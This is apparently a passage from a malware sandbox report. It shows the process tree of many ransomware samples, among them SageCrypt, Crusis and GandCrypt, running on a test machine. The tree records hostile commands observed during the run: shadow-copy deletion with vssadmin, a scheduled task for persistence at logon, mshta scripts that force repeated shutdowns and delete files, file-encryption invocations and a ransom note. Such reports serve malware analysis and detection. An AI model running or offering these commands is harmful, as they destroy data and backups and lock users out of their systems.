"+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\Admin\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.Run('cmd.exe /c for %o in (\x22-s -f -t 0\x22;\x22/s /f /t 0\x22) do shutdown %~o',0);close()}catch(e){}},5000);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('database.exe');close()}catch(e){}},10);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe');close()}catch(e){}},10);"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Control Panel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
• Suspicious use of AdjustPrivilegeToken
PID:2544
• C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
  3⤵
  • Executes dropped EXE
  • Sets desktop wallpaper using registry
  • Modifies Control Panel
  • Suspicious use of AdjustPrivilegeToken
  PID:664
• C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" /SC ONLOGON /RL HIGHEST /F
  3⤵
  • Scheduled Task/Job: Scheduled Task
  PID:5680
• C:\Windows\SysWOW64\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  3⤵
  • Interacts with shadow copies
  PID:3192
• C:\Windows\SysWOW64\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  3⤵
  • System Location Discovery: System Language Discovery
  • Interacts with shadow copies
  PID:5156
• C:\Windows\SysWOW64\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  3⤵
  • Interacts with shadow copies
  PID:6340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3380
